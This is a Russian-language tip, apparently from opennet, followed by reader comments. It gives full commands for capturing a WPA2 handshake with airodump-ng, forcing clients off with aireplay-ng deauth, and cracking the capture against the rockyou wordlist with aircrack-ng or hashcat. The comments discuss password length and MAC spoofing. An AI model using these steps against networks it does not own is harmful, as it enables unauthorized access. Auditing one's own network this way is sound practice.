Беспроводные сети на базе WPA/WPA2 не подвержены прямым методам атаки, но злоумышленник может получить доступ к системам, на которых установлен недостаточно надёжный пароль. Нижеприведённая инструкция позволяет проверить свои системы на предмет стойкости к атаке по типовому словарю паролей. Предлагается два метода восстановления пароля по перехваченному в трафике хэшу - при помощи [[http://aircrack-ng.org/ Aircrack-ng]] и [[http://hashcat.net/ Hashcat]].Устанавливаем Aircrack-ng:
sudo apt-get install aircrack-ng
Определяем, поддерживает ли беспроводная карта режим мониторинга (http://aircrack-ng.org/doku.php?id=compatible_cards - выбор поддерживаемых плат), на выходе будет список сетевых интерфейсов для которых имеется подобная поддержка:
airmon-ng
Переводим беспроводную плату в режим мониторинга:
airmon-ng start wlan0
Отслеживаем все проходящие в эфире кадры на предмет идентификаторов беспроводной сети (BSSID) и используемых номеров каналов.
airodump-ng mon0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5E:8A:C9:AB:C0 -81 19 0 0 6 54e WPA2 CCMP PSK mywifi
...Определив, что наша сеть имеет BSSID 9C:5E:8A:C9:AB:C0 и 6 канал, отслеживаем и сохраняем в файл capture/-01.cap трафик пакетов, связанных с согласованием нового соединения (ждём пока появится надпись "WPA handshake" и прерываем перехват по ctrl-c):
airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 -w capture/ mon0
Для того, чтобы не ждать долго инициируем обрыв соединения у подключенных клиентов (64:BC:0C:49:87:F7 - идентификатор клиента):
airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 mon0
BSSID STATION PWR Rate Lost Frames Probe
9C:5E:8A:C9:AB:C0 64:BC:0C:49:87:F7 -37 1e- 1e 4 6479 ASUSaireplay-ng -0 10 -a 9C:5E:8A:C9:AB:C0 -c 64:BC:0C:49:87:F7 mon0
Загружаем словарь с примерами паролей (размер 134MB, около 14 млн типовых паролей):curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/down...
Запускаем aircrack-ng в режиме подбора хэша пароля по словарю (подбор выполняется только на CPU, без привлечения GPU):
aircrack-ng -a2 -b 9C:5E:8A:C9:AB:C0 -w rockyou.txt capture/-01.cap
Или используем для этого [[https://github.com/brannondorsey/naive-hashcat naive-hashcat]] (более эффективен при наличии доступа к GPU), предварительно преобразовав cap-дамп в формат hccapx при помощи утилиты [[https://github.com/hashcat/hashcat-utils cap2hccapx]]:
cap2hccapx.bin capture/-01.cap capture/-01.hccapx
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.shURL: https://github.com/brannondorsey/wifi-cracking
Обсуждается: http://www.opennet.me/tips/info/3025.shtml
Просмотрел что пользуются паролями по словарю, дальше не интересно) Мои 25 не подберут. хотя недавно пришлось к сети подключать принтер, за...ся пока вбил пароль.
Хе, а у меня 32 - мд5 какой-то лабуды, ноут проще проводом воткнуть и скопировать, а на телефон смс отправить
я параноик? у меня 63, или вы из соседних палат?
у меня 20см.
Мы с вами из одной палаты, коллега.
А у меня 64 символа...
> Просмотрел что пользуются паролями по словарю, дальше не интересно) Мои 25 не
> подберут. хотя недавно пришлось к сети подключать принтер, за...ся пока вбил
> пароль.Главное WPS не выключайте !
Ставим пароль 12345678 и лочим по макам устройства. Хоть и есть в словаре, но отсеим 95% хакеров-любителей.
ты идиот? там видно при скане маки подключеных устройств, я могу твой мак вписать себе, вот ты лох.
> Ставим пароль 12345678 и лочим по макам устройства. Хоть и есть в
> словаре, но отсеим 95% хакеров-любителей.Если бы ты хоть что-то понимал в безопасности то догадался бы что сменить мак значительно проще чем сломать пароль, даже такой. И требования к оборудованию/ос намного меньше. Поэтому фильтр по маку - вообще не защита. Ну разве что если ты сам точкой пользоваться не будешь совсем, предоставив атакующему подбирать весь диапазон маков. Но если ты такой стебщик, проще поставить открытую точку доступа которая никуда не подключена. Или подключена через какой-нибудь очень хитро настроенный файрфол, чтобы пролезал только какой-нибудь днс туннель и более нифига.
Речь о хакерах любителях же. ну улыбнитесь хоть.
Вот ты будешь подменять маки устройств в сети во время перебора паролей? Сеть будет лагать, люди будут дергать шнур роутера и т д.
Ты не поверишь - сканить будут днём, а подменять мак ночью.
> Вот ты будешь подменять маки устройств в сети во время перебора паролей?Если сеть по другому не пускает - без вариантов.
> Сеть будет лагать, люди будут дергать шнур роутера и т д.
Зависит требуется ли скрытность. Если да - подождать пока какой-нибудь клиент угомонится, и тогда.
Огласите время перебора среднего пароля из 10 символов на квантовом компьютере, а то не усну.
Как заставить точку допускать одну аунтификацию в секунду, например? Микротик может?
Можно в metarouter поднять openwrt/lede с radius и поставить ему ограничения.
> Можно в metarouter поднять openwrt/lede с radius и поставить ему ограничения.Ага, а можно в вашей Виндовс поставить виртуалбокс и поднять там хакинтош чтобы ткнуть на красивую иконочку.
ps вы все равно не поймете, но как раз над кнопочкой metarouter есть кнопочка radius коли он вам так нужен
Ну что, все еще не уснул?
> Ну что, все еще не уснул?Давайте не дадим спать болезному полгода? Пусть он примет книгу рекордов.
внутривенно? :)
"Переводим беспроводную плату в режим мониторинга:airmon-ng start wlan0"
Ага, а что, любую карту так можно? раньше помнится были списки чипсетов которые такое позволяли...
> Ага, а что, любую карту так можно?Любую из списка. Ты новость вообще читал?
Спасибо за статью! Не знал, что так всё просто.
а слабо было "iwconfig wlan0 mode Monitor" попробовать ? Тут нелинуксоиды вопросы оставляют с хитрым словом "чипсет" ???
> Не знал, что так всё просто.Знал, что так всё не просто.
Знал, что не всё так просто.